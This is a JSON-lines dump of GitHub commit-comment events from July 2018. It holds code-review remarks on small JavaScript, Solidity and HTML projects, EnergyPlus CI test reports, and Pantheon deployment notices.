{"id":"7925796076","type":"CommitCommentEvent","actor":{"login":"robbyoconnor"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29614315,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T22:04:16Z","updated_at":"2018-07-05T22:04:16Z","author_association":"CONTRIBUTOR","body":"Yeah it pulls output from the shell -- for example rvm doesn't play nice with zsh sometimes. "}},"created_at":"2018-07-05T22:04:16Z"}
{"id":"7925797449","type":"CommitCommentEvent","actor":{"login":"shuoyangd"},"repo":{"name":"shuoyangd/OpenNMT-py"},"payload":{"comment":{"id":29614321,"position":20,"line":20,"path":"onmt/modules/RNNGLoss.py","commit_id":"592a3ac95732df089f23753fae1dd9c3a3333d68","created_at":"2018-07-05T22:04:40Z","updated_at":"2018-07-05T22:04:40Z","author_association":"OWNER","body":"This is not right, because range of the shift-reduce actions is longer than that of words. Needs to figure out how this range works."}},"created_at":"2018-07-05T22:04:40Z"}
{"id":"7925799743","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614326,"position":62,"line":66,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T22:05:20Z","updated_at":"2018-07-05T22:05:20Z","author_association":"NONE","body":"These `&&` expressions are easier on the eyes when written out with multiple `require()` statements. "}},"created_at":"2018-07-05T22:05:20Z"}
{"id":"7925802970","type":"CommitCommentEvent","actor":{"login":"aero29"},"repo":{"name":"aero29/NAX"},"payload":{"comment":{"id":29614333,"position":null,"line":null,"path":null,"commit_id":"d7cbeedfd9ddd04493d6ec77a7ad89a9b20965b4","created_at":"2018-07-05T22:06:19Z","updated_at":"2018-07-05T22:06:19Z","author_association":"OWNER","body":"Directory containing executables for all OS"}},"created_at":"2018-07-05T22:06:19Z"}
{"id":"7925804565","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29614337,"position":110,"line":104,"path":"contracts/FundsSplitter.sol","commit_id":"9a0568f89a567ca739917d3e8749017aa5b9dd79","created_at":"2018-07-05T22:06:48Z","updated_at":"2018-07-05T22:06:48Z","author_association":"NONE","body":"Ah ha ... yes, this is where `public` variables (near line 14) will help simplify matters. You won't need this function. "}},"created_at":"2018-07-05T22:06:48Z"}
{"id":"7925804588","type":"CommitCommentEvent","actor":{"login":"AjaiGarner1"},"repo":{"name":"AjaiGarner1/Prominspirations"},"payload":{"comment":{"id":29614338,"position":4,"line":34,"path":"main.html","commit_id":"78a0793a8c0b0a528b1d6c7cb79d656f0e2e65a5","created_at":"2018-07-05T22:06:48Z","updated_at":"2018-07-05T22:06:48Z","author_association":"OWNER","body":"![dress1](https://user-images.githubusercontent.com/40872170/42348861-cddf1fe6-805f-11e8-819e-02109458e3be.jpg)\" height=\"300\" width=\"300\">"}},"created_at":"2018-07-05T22:06:48Z"}
{"id":"7925804835","type":"CommitCommentEvent","actor":{"login":"Rob--W"},"repo":{"name":"matthijsmelissen/qif-converter"},"payload":{"comment":{"id":29614344,"position":63,"line":138,"path":"script.js","commit_id":"1684b13a4b1392e491e929afd70e0d41310830c0","created_at":"2018-07-05T22:06:53Z","updated_at":"2018-07-05T22:06:53Z","author_association":"NONE","body":"This should be `fields` too, instead of `$fields`."}},"created_at":"2018-07-05T22:06:53Z"}
{"id":"7925806145","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614348,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T22:07:17Z","updated_at":"2018-07-05T22:07:17Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2929 of 2930 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T22:07:17Z"}
{"id":"7925815772","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614366,"position":21,"line":30,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:10:09Z","updated_at":"2018-07-05T22:10:09Z","author_association":"COLLABORATOR","body":"You should make sure you remove all `console.log`s before committing your code."}},"created_at":"2018-07-05T22:10:09Z"}
{"id":"7925819043","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614376,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:11:06Z","updated_at":"2018-07-05T22:11:06Z","author_association":"COLLABORATOR","body":"Javascript objects are best described by:\r\n```javascript\r\nconst item = { value: valueVariable }\r\n```\r\nyou don't need the double quotes."}},"created_at":"2018-07-05T22:11:06Z"}
{"id":"7925820971","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614381,"position":21,"line":30,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:11:40Z","updated_at":"2018-07-05T22:11:40Z","author_association":"OWNER","body":"I still need them i'll remove them once i'm finished with them\n\nOn Thu, Jul 5, 2018 at 11:10 PM, Hideya Swider <notifications@github.com>\nwrote:\n\n> You should make sure you remove all console.logs before committing your\n> code.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ImenBenA/Tasks/commit/7a5eb4b36182afacc99df1d66edfeb57139f66d1#commitcomment-29614366>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AihdttrwrovQcN_nJZGOyuQKPcy0FueAks5uDo7BgaJpZM4VEnCJ>\n> .\n>\n"}},"created_at":"2018-07-05T22:11:40Z"}
{"id":"7925822081","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614387,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:12:03Z","updated_at":"2018-07-05T22:12:03Z","author_association":"COLLABORATOR","body":"Also, thanks to ES6, you can use the shortcut: `const item = { value }`. JavaScript will understand that you're defining a property called `value` to which you're assigning the value of `value`."}},"created_at":"2018-07-05T22:12:03Z"}
{"id":"7925825257","type":"CommitCommentEvent","actor":{"login":"lacartaya"},"repo":{"name":"lacartaya/pagina-web"},"payload":{"comment":{"id":29614394,"position":5,"line":9,"path":"index.html","commit_id":"414771478420884ef5f40e54c0b070a0223d445f","created_at":"2018-07-05T22:12:57Z","updated_at":"2018-07-05T22:12:57Z","author_association":"OWNER","body":"en esta linea seria mejor colocar un <p>"}},"created_at":"2018-07-05T22:12:57Z"}
{"id":"7925825313","type":"CommitCommentEvent","actor":{"login":"xzyfer"},"repo":{"name":"sass/node-sass"},"payload":{"comment":{"id":29614396,"position":5,"line":71,"path":"package.json","commit_id":"ef713a7f4b4c02e05a16b37f4a2ed1d5a535900e","created_at":"2018-07-05T22:12:59Z","updated_at":"2018-07-05T22:12:59Z","author_association":"CONTRIBUTOR","body":"Yes. Request has shown a disregard for breaking Node support and they do test Node < 4 in CI. We are not will to risk another breaking in support."}},"created_at":"2018-07-05T22:12:59Z"}
{"id":"7925826894","type":"CommitCommentEvent","actor":{"login":"drnic"},"repo":{"name":"starkandwayne/concourse-tutorial"},"payload":{"comment":{"id":29614399,"position":null,"line":null,"path":null,"commit_id":"498309c6d817260a7be4361089c79cd4594aea53","created_at":"2018-07-05T22:13:27Z","updated_at":"2018-07-05T22:13:27Z","author_association":"MEMBER","body":"I'm sure I'll change my mind in the future and everything will change to snakeCaseIsCoolForFileNames 😄 "}},"created_at":"2018-07-05T22:13:27Z"}
{"id":"7925827337","type":"CommitCommentEvent","actor":{"login":"cheshire"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29614401,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-05T22:13:35Z","updated_at":"2018-07-05T22:13:35Z","author_association":"MEMBER","body":"Committed in https://github.com/apple/swift-compiler-rt/commit/2512e53fcda17574ef079046a2a30477349b7923, stable is auto-merged from swift-4.2-branch"}},"created_at":"2018-07-05T22:13:35Z"}
{"id":"7925827453","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614403,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:13:37Z","updated_at":"2018-07-05T22:13:37Z","author_association":"COLLABORATOR","body":"You don't need to save the index. Because index is the index of the element. It's a meta data you can get from the list.\r\nThink about a list in Java. When you loop through it, do you need an external `i`?"}},"created_at":"2018-07-05T22:13:37Z"}
{"id":"7925828608","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29614409,"position":null,"line":null,"path":null,"commit_id":"6c2da970dcbde0c4358e83bafbf1b2cb71b4ca81","created_at":"2018-07-05T22:14:00Z","updated_at":"2018-07-05T22:14:00Z","author_association":"OWNER","body":"Created multidev environment [borked#ci-30](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#ci-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-30-borked.pantheonsite.io/)"}},"created_at":"2018-07-05T22:14:00Z"}
{"id":"7925829671","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614410,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:14:20Z","updated_at":"2018-07-05T22:14:20Z","author_association":"COLLABORATOR","body":"You also don't need to define a done variable here.\r\nA shortcut for this line is:\r\n`const item = { value, done: false }`"}},"created_at":"2018-07-05T22:14:20Z"}
{"id":"7925831853","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614419,"position":39,"line":46,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:15:03Z","updated_at":"2018-07-05T22:15:03Z","author_association":"COLLABORATOR","body":"Good job on using the list's `filter`!\r\n💯 "}},"created_at":"2018-07-05T22:15:03Z"}
{"id":"7925833567","type":"CommitCommentEvent","actor":{"login":"ShickLiu"},"repo":{"name":"ShickLiu/important"},"payload":{"comment":{"id":29614423,"position":null,"line":null,"path":null,"commit_id":"50cbae73d1f5ed1963abe771b7557ca2fbd0cc39","created_at":"2018-07-05T22:15:34Z","updated_at":"2018-07-05T22:15:34Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-05T22:15:34Z"}
{"id":"7925833921","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29614424,"position":null,"line":null,"path":null,"commit_id":"ea656ac04ec0211d7c8af93be79870345736aba3","created_at":"2018-07-05T22:15:40Z","updated_at":"2018-07-05T22:15:40Z","author_association":"OWNER","body":"Created multidev environment [borked#pr-4](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-borked.pantheonsite.io/)"}},"created_at":"2018-07-05T22:15:40Z"}
{"id":"7925834742","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29614428,"position":5,"line":5476,"path":"easylist/easylist_specific_block.txt","commit_id":"62a5e38447747aa4cf1ee3a67ad059b0477f0d24","created_at":"2018-07-05T22:15:54Z","updated_at":"2018-07-05T22:15:54Z","author_association":"CONTRIBUTOR","body":"Removed ~3 hours ago here https://github.com/easylist/easylist/commit/70be3e397cb2a42b76d1764e4ea0bedf42471d91"}},"created_at":"2018-07-05T22:15:54Z"}
{"id":"7925834921","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29614429,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-05T22:15:58Z","updated_at":"2018-07-05T22:15:58Z","author_association":"CONTRIBUTOR","body":"Does the physlist/optical/enable allow for registering the optical photon hits as well, or would you still need to set the boolean for registering those hits in the GenericDetector.cc file line 21? "}},"created_at":"2018-07-05T22:15:58Z"}
{"id":"7925836367","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614434,"position":52,"line":55,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:16:24Z","updated_at":"2018-07-05T22:16:24Z","author_association":"COLLABORATOR","body":"You can do: `const oldItem = list[i]`"}},"created_at":"2018-07-05T22:16:24Z"}
{"id":"7925837111","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614435,"position":59,"line":62,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:16:38Z","updated_at":"2018-07-05T22:16:38Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-05T22:16:38Z"}
{"id":"7925838693","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614439,"position":71,"line":76,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:17:09Z","updated_at":"2018-07-05T22:17:09Z","author_association":"COLLABORATOR","body":"`list.map( (item, index) => {})`"}},"created_at":"2018-07-05T22:17:09Z"}
{"id":"7925841621","type":"CommitCommentEvent","actor":{"login":"papuzzy"},"repo":{"name":"dahrahmohlah/clms"},"payload":{"comment":{"id":29614444,"position":null,"line":null,"path":null,"commit_id":"4543a951092af3d9362a6dfd2a7cfe594866e9e8","created_at":"2018-07-05T22:18:03Z","updated_at":"2018-07-05T22:18:03Z","author_association":"CONTRIBUTOR","body":"See mistakes I made. Chai"}},"created_at":"2018-07-05T22:18:03Z"}
{"id":"7925842180","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29614445,"position":5,"line":5476,"path":"easylist/easylist_specific_block.txt","commit_id":"62a5e38447747aa4cf1ee3a67ad059b0477f0d24","created_at":"2018-07-05T22:18:14Z","updated_at":"2018-07-05T22:18:14Z","author_association":"MEMBER","body":"all good"}},"created_at":"2018-07-05T22:18:14Z"}
{"id":"7925850062","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614499,"position":null,"line":null,"path":null,"commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:20:45Z","updated_at":"2018-07-05T22:20:45Z","author_association":"COLLABORATOR","body":"Last thought about this commit: the commit message should say something about the the commit - not the problem.\r\nIf I were you I'd say: `Adjusting data structure for elements`.\r\nI would also do what you did in 2 commits. First one: renaming the `checked` prop to `done` then work on the actual data structure commit."}},"created_at":"2018-07-05T22:20:45Z"}
{"id":"7925850934","type":"CommitCommentEvent","actor":{"login":"lacartaya"},"repo":{"name":"lacartaya/pagina-web"},"payload":{"comment":{"id":29614506,"position":5,"line":9,"path":"index.html","commit_id":"414771478420884ef5f40e54c0b070a0223d445f","created_at":"2018-07-05T22:21:00Z","updated_at":"2018-07-05T22:21:00Z","author_association":"OWNER","body":"yo creo que es mejor un div"}},"created_at":"2018-07-05T22:21:00Z"}
{"id":"7925852565","type":"CommitCommentEvent","actor":{"login":"elimisteve"},"repo":{"name":"PursuanceProject/pursuance"},"payload":{"comment":{"id":29614514,"position":5,"line":243,"path":"src/components/Content/RightPanel/TaskList/TaskList.js","commit_id":"f795c761ec23179410d5c1e00ebf09fd513bb9e1","created_at":"2018-07-05T22:21:29Z","updated_at":"2018-07-05T22:21:29Z","author_association":"MEMBER","body":"Perfect"}},"created_at":"2018-07-05T22:21:29Z"}
{"id":"7925852645","type":"CommitCommentEvent","actor":{"login":"Tratcher"},"repo":{"name":"pakrym/pipelines"},"payload":{"comment":{"id":29614515,"position":9,"line":284,"path":"pipelines.md","commit_id":"cc115beb8fe5ae056e8b32786a6ddaee97f4513d","created_at":"2018-07-05T22:21:31Z","updated_at":"2018-07-05T22:21:31Z","author_association":"NONE","body":"Extra line"}},"created_at":"2018-07-05T22:21:31Z"}
{"id":"7925853129","type":"CommitCommentEvent","actor":{"login":"elimisteve"},"repo":{"name":"PursuanceProject/pursuance"},"payload":{"comment":{"id":29614521,"position":6,"line":244,"path":"src/components/Content/RightPanel/TaskList/TaskList.js","commit_id":"f795c761ec23179410d5c1e00ebf09fd513bb9e1","created_at":"2018-07-05T22:21:39Z","updated_at":"2018-07-05T22:21:39Z","author_association":"MEMBER","body":"Remove? :-)"}},"created_at":"2018-07-05T22:21:39Z"}
{"id":"7925853199","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614524,"position":21,"line":30,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:21:40Z","updated_at":"2018-07-05T22:21:40Z","author_association":"COLLABORATOR","body":"You can always delete them and add then again afterwards. At this point, it's probably not that important to delete them. But it's a thought you should always keep in mind."}},"created_at":"2018-07-05T22:21:40Z"}
{"id":"7925853584","type":"CommitCommentEvent","actor":{"login":"futurejones"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29614527,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-05T22:21:47Z","updated_at":"2018-07-05T22:21:47Z","author_association":"NONE","body":"Thanks @cheshire "}},"created_at":"2018-07-05T22:21:47Z"}
{"id":"7925854120","type":"CommitCommentEvent","actor":{"login":"lratliff"},"repo":{"name":"MAGIRT/ALA2018"},"payload":{"comment":{"id":29614530,"position":null,"line":null,"path":null,"commit_id":"c3267d299bd3786e722c8fa16f009c2ffc467821","created_at":"2018-07-05T22:21:57Z","updated_at":"2018-07-05T22:21:57Z","author_association":"COLLABORATOR","body":"**The Role of the Subject Librarian in the Spatial Humanities -- Chelcie Juliet Rowell**\r\n[2018-06-22_subject-librarian-spatial-humanities.pdf](https://github.com/MAGIRT/ALA2018/files/2168378/2018-06-22_subject-librarian-spatial-humanities.pdf)\r\n\r\n**Spatial Humanities: An Introduction to Space and Place in Digital Scholarship -- Kathy Hart Weimer**\r\n[ALA 2018 Kathy.pdf]\r\n(https://github.com/MAGIRT/ALA2018/files/2168380/ALA.2018.Kathy.pdf)\r\n\r\n**Librarian As a Collaborator: Supporting Spatial Humanities Research Projects -- Nicole Kong**\r\n[Spatial Humanities_Kong.pdf](https://github.com/MAGIRT/ALA2018/files/2168381/Spatial.Humanities_Kong.pdf)\r\n"}},"created_at":"2018-07-05T22:21:57Z"}
{"id":"7925857183","type":"CommitCommentEvent","actor":{"login":"riverDeer12"},"repo":{"name":"riverDeer12/uniriWebsite"},"payload":{"comment":{"id":29614547,"position":null,"line":null,"path":null,"commit_id":"0f88b101179dd7ae26856bcf2ccc8c292f5687af","created_at":"2018-07-05T22:22:51Z","updated_at":"2018-07-05T22:22:51Z","author_association":"OWNER","body":"haha seronja"}},"created_at":"2018-07-05T22:22:51Z"}
{"id":"7925857711","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614551,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-05T22:23:00Z","updated_at":"2018-07-05T22:23:00Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T22:23:00Z"}
{"id":"7925857864","type":"CommitCommentEvent","actor":{"login":"simon-frank"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29614553,"position":null,"line":null,"path":null,"commit_id":"7a4788df8645c8c7e9d505f89e7b4947c836c16f","created_at":"2018-07-05T22:23:03Z","updated_at":"2018-07-05T22:23:03Z","author_association":"COLLABORATOR","body":"Da bin ich jetzt schon stark enttäuscht von dir "}},"created_at":"2018-07-05T22:23:03Z"}
{"id":"7925875365","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29614602,"position":null,"line":null,"path":null,"commit_id":"3c35ab41cd04d26234996060964c17a372a1d128","created_at":"2018-07-05T22:28:34Z","updated_at":"2018-07-05T22:28:34Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [removescre](https://removescre-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/migrate](https://removescre-static-docs.pantheonsite.io/docs/migrate)\n- [source/docs/assets/images/dashboard/migration-authentication-prompt.png](https://github.com/pantheon-systems/documentation/commit/3c35ab41cd04d26234996060964c17a372a1d128/source/docs/assets/images/dashboard/migration-authentication-prompt.png)\n"}},"created_at":"2018-07-05T22:28:34Z"}
{"id":"7925875642","type":"CommitCommentEvent","actor":{"login":"ChengJeremy"},"repo":{"name":"ChengJeremy/VEMP"},"payload":{"comment":{"id":29614603,"position":null,"line":null,"path":null,"commit_id":"6ea4a00b01fa50a44159d094e70db6cc427fc7aa","created_at":"2018-07-05T22:28:40Z","updated_at":"2018-07-05T22:28:40Z","author_association":"OWNER","body":"We're not using a solenoid anymore, right?"}},"created_at":"2018-07-05T22:28:40Z"}
{"id":"7925876885","type":"CommitCommentEvent","actor":{"login":"s-spavound"},"repo":{"name":"kvasilopoulos/exuber"},"payload":{"comment":{"id":29614606,"position":null,"line":null,"path":null,"commit_id":"f59ec4ed1cd6b59700a77b06329eb29a76b34040","created_at":"2018-07-05T22:29:07Z","updated_at":"2018-07-05T22:29:07Z","author_association":"COLLABORATOR","body":"I agree probably it is the Armadillo that causes this."}},"created_at":"2018-07-05T22:29:07Z"}
{"id":"7925879883","type":"CommitCommentEvent","actor":{"login":"teriu"},"repo":{"name":"vital-software/vitalizer"},"payload":{"comment":{"id":29614612,"position":null,"line":null,"path":null,"commit_id":"58c83f1b5ac0ff0d8436cc4db8511ba7be42ea35","created_at":"2018-07-05T22:30:03Z","updated_at":"2018-07-05T22:30:03Z","author_association":"MEMBER","body":"I'll implement in https://github.com/vital-software/vitalizer/pull/107 too"}},"created_at":"2018-07-05T22:30:03Z"}
{"id":"7925884695","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29614630,"position":null,"line":null,"path":null,"commit_id":"df03a392148de8142aacd084d5eeec9e4d122be9","created_at":"2018-07-05T22:31:32Z","updated_at":"2018-07-05T22:31:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-415](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-415).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-415-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T22:31:32Z"}
{"id":"7925885550","type":"CommitCommentEvent","actor":{"login":"RubenCallata"},"repo":{"name":"MartinRobles1/Special-dishes"},"payload":{"comment":{"id":29614631,"position":null,"line":null,"path":null,"commit_id":"3c5f8f423892ad18b3521d5fb7bd9d7bd62b3ecf","created_at":"2018-07-05T22:31:49Z","updated_at":"2018-07-05T22:31:49Z","author_association":"COLLABORATOR","body":"Martín,\r\n\r\nAgregare otros tipos de platos para que el usuario pueda encontrar una mayor variedad."}},"created_at":"2018-07-05T22:31:49Z"}
{"id":"7925891112","type":"CommitCommentEvent","actor":{"login":"generalisofficial"},"repo":{"name":"swf541/Cold-War--The-Iron-Curtain"},"payload":{"comment":{"id":29614635,"position":null,"line":null,"path":null,"commit_id":"3f3f927e533eeedd868782d2a744d320b37e488b","created_at":"2018-07-05T22:33:37Z","updated_at":"2018-07-05T22:33:37Z","author_association":"COLLABORATOR","body":"no!"}},"created_at":"2018-07-05T22:33:37Z"}
{"id":"7925896191","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29614642,"position":5,"line":93,"path":"dep/acelite/ace/OS_NS_dlfcn.inl","commit_id":"cabff442781e6219e8ab0fd2f276b430d95a8dfe","created_at":"2018-07-05T22:35:16Z","updated_at":"2018-07-05T22:35:16Z","author_association":"MEMBER","body":"Epic Fail 👍 "}},"created_at":"2018-07-05T22:35:16Z"}
{"id":"7925896337","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614643,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:35:19Z","updated_at":"2018-07-05T22:35:19Z","author_association":"OWNER","body":"What do you mean \"You don't need to save the index. Because index is the index of the element. It's a meta data you can get from the list\". I am filtering the list using the index and the index has to be stored"}},"created_at":"2018-07-05T22:35:19Z"}
{"id":"7925902377","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29614659,"position":null,"line":null,"path":null,"commit_id":"ea656ac04ec0211d7c8af93be79870345736aba3","created_at":"2018-07-05T22:37:15Z","updated_at":"2018-07-05T22:37:15Z","author_association":"OWNER","body":"Created multidev environment [borked#pr-4](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-borked.pantheonsite.io/)"}},"created_at":"2018-07-05T22:37:15Z"}
{"id":"7925905373","type":"CommitCommentEvent","actor":{"login":"ProbablePrime"},"repo":{"name":"mixer/cdk-preact-starter"},"payload":{"comment":{"id":29614668,"position":35,"line":37,"path":"src/prefabs/default-scene/scene.tsx","commit_id":"3e15dbedd6d16101b1accba46c74f22e29fc3107","created_at":"2018-07-05T22:38:12Z","updated_at":"2018-07-05T22:38:12Z","author_association":"MEMBER","body":"This is a UX limitation at the moment."}},"created_at":"2018-07-05T22:38:12Z"}
{"id":"7925906913","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614676,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-05T22:38:40Z","updated_at":"2018-07-05T22:38:40Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-05T22:38:40Z"}
